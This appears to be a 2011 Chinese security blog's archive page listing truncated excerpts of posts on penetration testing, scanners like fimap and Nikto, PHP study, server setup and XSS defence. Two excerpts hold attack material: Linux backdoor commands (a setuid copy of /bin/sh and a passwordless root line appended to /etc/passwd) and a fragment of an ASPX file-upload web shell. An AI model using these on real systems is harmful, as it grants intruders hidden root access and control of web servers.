2011年11月_7禧

原创渗透测试(Penetration Testing)

Author : ZwelL来源：www.nosec.org零、前言一、简介二、制定实施方案三、具体操作过程四、生成报告五、测试过程中的风险及规避参考资料FAQ集零、前言渗透测试在未得到被测试方授权之前依据某些地区法律规定是违法行为。这里我们提供的所有渗透测试方法均为（假设为）合法的评估服务，也就是通常所说的道德黑客

2011-11-28 19:11:34 1112

原创 linux 系统留后门方法+日志清除

1. setuid #cp /bin/sh /tmp/.sh #chmod u+s /tmp/.sh 加上 suid 位到shell上，虽然很简单，但容易被发现 2. echo "hack::0:0::/:/bin/csh" >> /etc/passwd 即给系统增加一个 id 为 0（root)的帐号，无口令。但管理员很快就可以发现哦！ 3.echo "

2011-11-28 19:09:01 1650

原创详述SSL和TLS的Web安全渗透测试

如果Web服务中的SSL和TLS协议出现安全问题，后果会如何？很明显，这样的话攻击者就可以拥有你所有的安全信息，包括我们的用户名、密码、信用卡、银行信息……所有的一切。本文将向读者详细介绍如何针对Web服务中的SSL和TLS协议进行安全渗透测试。我们首先对这两种协议进行了概述，然后详细介绍了针对加密信道安全性的黑盒测试和白盒测试。最后列出了一些常用的安全测试工具。一、简介目前，许多

2011-11-26 20:07:44 3825

原创 SiteServer 3.4.4 逻辑漏洞导致SQL注入及修复方法

今天特别发现SiteServe CMS（ 3.4.4 ）网站根目录多了一个asp文件，我就意识网站可以被挂马了！马上排查，终于在后台发现多了一个blue用户名的超级管理员。我猜想可能是SiteServe CMS系统有漏洞，上网一查，果然把到一堆“SiteServer 3.4.4 逻辑漏洞导致SQL注入”的文章。----------------------------------------

2011-11-18 16:47:53 1250

原创谈谈新手如何学习PHP

我先把我自己学习PHP的过程做一下概括： (1)熟悉HTML/CSS/JS等网页基本元素，完成阶段可自行制作完整的网页，对元素属性达到熟悉程度 (2)理解动态语言的概念，运做机制，熟悉PHP语法 (3)学习如何将PHP与HTML结合起来完成简单动态页面 (4)接触MYSQL，开始设计数据库程序 (5)不断巩固，摸透大部分PHP常用函数，并可理解OOP，MYSQL优化，

2011-11-16 11:54:25 654

原创 Fimap 应用说明

Fimap 是一款本地及远程都包含文件漏洞检测工具，并能对检测到的漏洞进行利用，带了一个google 的语法搜索功能。参考网站:http://code.google.com/p/fimap/ ./fimap.py -h --帮助./fimap.py -u 'www.google.com/p?=lostwolf' #单url检测./fimap.py -m -l u

2011-11-14 22:25:43 1411

原创 Nikto2 使用说明

名称：Nikto2开发语言：perl官方网站：http://www.cirt.net/说明：Nikto2 是一款使用perl 语言写的多平台扫描软件，是一款命令行模式的工具，它可以扫描指定主机的web类型、主机名、特定目录、cookie、特定cgi 漏洞、xss漏洞、sql注入漏洞、返回主机允许的http 方法等安全问题。Nikto 是一款非常著名的web评估工具，几乎到

2011-11-14 22:24:29 832

转载入侵oracle数据库的一些心得

信息来源: I.S.T.O一、先看下面的一个贴子: Oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点： 1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库，其大小可到几百千兆，可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用，并使数据争用最小，保证数据一致性。系

2011-11-09 15:41:02 732

原创 ASPX 1句话SHELL

ISTO的版本 ASPX One Code " enctype="multipart/form-data">filename: c#if (Request.Files.Count!=0) { Request.Files[0].SaveAs(Server.MapPath(Request["f"]) ); }

2011-11-09 15:28:39 602

原创 office 2010每次打开word都要重新配置的解决方法

在“运行”中输入 reg add HKCU\Software\Microsoft\Office\14.0\Word\Options /v NoReReg /t REG_DWORD /d 1，回车。就是在 HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options 项中新建一个名为 NoReReg 的 DWORD 值，并将其数值设为

2011-11-07 11:44:26 784

原创 Ubuntu Linux下设置IP的配置命令

1、首先确定网络连接是否正确，所用的网线是否可以正常工作2、查看网卡是否能正常工作，检测的方法如下：a、ping 127.0.0.1b、ping 静态网关地址c、ping 主机名（hostname就可以看到主机名）3、看网卡地址是否配置正确（ifconfig命令看本地主机的网卡信息，和DNS、Default getway、Sever地址进行比对，看网卡地址是

2011-11-07 01:35:50 644

转载 Asp.net夜话之一：asp.net介绍

http://blog.csdn.net/zhoufoxcn/article/details/2915811

2011-11-03 10:46:26 396

原创 MYSQL数据库导入数据时出现乱码的解决办法

我是用的最后一种方法，前面三种解决MYSQL导入数据乱码的方法没试过，东莞SEO推荐大家直接使用第四种方法处理MYSQL导入中文数据时的乱码问题。首先在新建数据库时一定要注意生成原数据库相同的编码形式，如果已经生成可以用phpmyadmin等工具再整理一次，防止数据库编码和表的编码不统一造成乱码。方法一: 通过增加参数 –default-chara

2011-11-02 09:24:48 1078

原创 Web应用安全审计清单

下面是这有助于在Web应用安全方面为数不多的审计清单。http://msdn.microsoft.com/en-us/library/aa302332.aspxhttps://blogs.sans.org/it-audit/checklists/web-application-audit-checklist/http://www.owasp.org/index.php/Catego

2011-11-01 16:16:32 455

原创 nginx设置上传目录无执行权限

在windows+iis下，可以设置上传目录，类似:upload,uploadfile,attachments，这样的目录下面无脚本执行权限，从而防止非法用户上传脚本得到webshellnginx上也很简单，我们使用location。。如下：location ~ ^/upload/.*\.(php|php5)${deny all;}其中upload换为你要设置的目录

2011-11-01 11:12:45 1011

原创攻击方式学习系列（总） CoderZh

(原创)攻击方式学习之(1) - 跨站式脚本(Cross-Site Scripting)(原创)攻击方式学习之(2) - SQL注入(SQL Injection)(原创)攻击方式学习之(3) - 缓冲区溢出(Buffer Overflow)(原创)攻击方式学习之(4) - 拒绝服务(DOS/DDOS/DRDOS) 番外

2011-11-01 11:00:22 597

原创 AntiXSS - 支持Html同时防止XSS攻击

跨站脚本攻击（XSS）已经不是什么新鲜的话题了，甚至很多大公司也为此吃尽苦头。最简单直接的防范方法，就是不允许任何html标签输入，对用户输入进行编码(htmlencode)。但是如果想用户输入支持一些格式，怎么办？一种办法就是很多论坛采用的BB Code的方法。使用特定的标签代替一些格式。比如：[B]表示粗体，等等。但是，BB Code这种形式并不被广泛接受，它的表现力实在太差了，而且并

2011-11-01 10:42:24 555

原创 CentOS + Nginx 环境搭建教程

前言：本文是关于如何搭建基于“CentOS5.4 + Nginx0.8.24 + PHP5.2.11（FastCGI）+ GD + ZendOptimizer + Mysql5.1.40 + 系统优化 + 防ddos攻击”高性能、高负载Web服务器的文章，安装方式为源代码安装。文档目录获取相关开源软件包安装、升级所需的程序库安装 Mysql5.1.40安装 Nginx

2011-11-01 09:55:24 589

收集盒 Book box